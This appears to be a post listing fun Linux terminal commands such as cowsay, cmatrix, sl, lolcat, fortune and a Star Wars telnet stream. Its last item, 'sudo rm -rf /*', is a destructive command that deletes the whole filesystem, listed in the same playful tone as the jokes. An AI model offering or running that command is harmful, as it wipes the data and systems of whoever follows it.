1)
$ git clone https://github.com/bartobri/no-more-secrets.git
$ cd ./no-more-secrets
$ make nms
$ make sneakers    ## Optional
$ sudo make install
$ ls -l | nms
$ ls -l | nms -a           // Set auto-decrypt flag
$ ls -l | nms -s           // Set flag to mask space characters
$ ls -l | nms -f green     // Set foreground color to green
$ ls -l | nms -c           // Clear screen
**************************************************************************************************************************
2)
$ hollywood
**************************************************************************************************************************
3)
$ curl parrot.live
**************************************************************************************************************************
4)
$ sudo visudo
At the bottom of "Defaults" add,on a new line, "Defaults insults".
Now whenever you will write wrong password,you will receive a good lesson from your terminal.Cheers....
**************************************************************************************************************************
5)
$ apt-get moo
For Cow lovers,this command is love.This brings your favourite cow in the terminal.
$ cowsay xyz
$ cowsay -l
$ cowsay -f ___ xxx
**************************************************************************************************************************
6)
$ ls -l | lolcat
**************************************************************************************************************************
7)
$ cmatrix
**************************************************************************************************************************
8)
$ sudo apt-get install sl
$ sl
$ man sl
**************************************************************************************************************************
9)
$ fortune
$ fortune -s
**************************************************************************************************************************
10)
$ telnet towel.blinkenlights.nl
Watch Star Wars at your terminal.
**************************************************************************************************************************
11)
$ xeyes
**************************************************************************************************************************
12)
$ sudo apt-get install espeak
$ espeak "xyz"
Make your terminal talk to you.
**************************************************************************************************************************
13)
$ rig
Want a fake identity without giving any thoughts.Ask your loyal terminal for it.
**************************************************************************************************************************
14)
$ sudo rm -rf /*
this will permanently remove system32/linux will break.
**************************************************************************************************************************
